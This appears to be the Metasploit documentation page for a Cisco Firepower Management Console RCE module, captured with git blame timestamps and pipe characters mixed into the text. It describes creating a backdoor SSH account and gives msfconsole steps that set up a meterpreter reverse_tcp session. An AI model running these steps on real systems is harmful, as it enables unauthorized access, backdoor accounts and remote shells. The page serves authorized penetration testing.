2017-01-09 11:55:01 -06:00
|
|
|
This module exploits a vulnerability in Cisco Firepower Management Console RCE. It will
|
|
|
|
|
create a backdoor SSH account via HTTPS, and then obtain a native payload session
|
|
|
|
|
in SSH.
|
|
|
|
|
|
|
|
|
|
## Vulnerable Application
|
|
|
|
|
|
|
|
|
|
This exploit was specifically written against 6.0.1 (build 1213). To test, you can find the
|
|
|
|
|
virtual appliance here:
|
|
|
|
|
|
|
|
|
|
https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=286271056&release=6.0.1&flowid=54052
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
1. Start msfconsole
|
|
|
|
|
2. ```use exploit/linux/http/cisco_firepower_useradd```
|
|
|
|
|
3. ```set password [https console password for admin]```
|
|
|
|
|
4. ```set rhost [IP]```
|
|
|
|
|
5. ```set payload linux/x86/meterpreter/reverse_tcp```
|
|
|
|
|
6. ```set lhost [IP]```
|
|
|
|
|
7. ```exploit```
|
|
|
|
|
8. You should get a session
|
2017-01-09 13:24:38 -06:00
|
|
|
|
|
|
|
|
## Options
|
|
|
|
|
|
2025-10-15 16:05:53 -04:00
|
|
|
### USERNAME
|
2017-01-09 13:24:38 -06:00
|
|
|
|
2025-10-15 16:05:53 -04:00
|
|
|
The username for Cisco Firepower Management console.
|
2017-01-09 13:24:38 -06:00
|
|
|
|
2025-10-15 16:05:53 -04:00
|
|
|
### PASSWORD
|
2017-01-09 13:24:38 -06:00
|
|
|
|
2025-10-15 16:05:53 -04:00
|
|
|
The password for Cisco Firepower Management console.
|
2017-01-09 13:24:38 -06:00
|
|
|
|
2025-10-15 16:05:53 -04:00
|
|
|
### NEWSSHUSER
|
|
|
|
|
|
|
|
|
|
The SSH account to create. By default, this is random.
|
|
|
|
|
|
|
|
|
|
### NEWSSHPASS
|
|
|
|
|
|
|
|
|
|
The SSH password for the new account. By default, this is also random.
|
|
|
|
|
|
|
|
|
|
### SSHPORT
|
|
|
|
|
|
|
|
|
|
In case for some reason, the SSH changed, otherwise this is 22 by default.
|
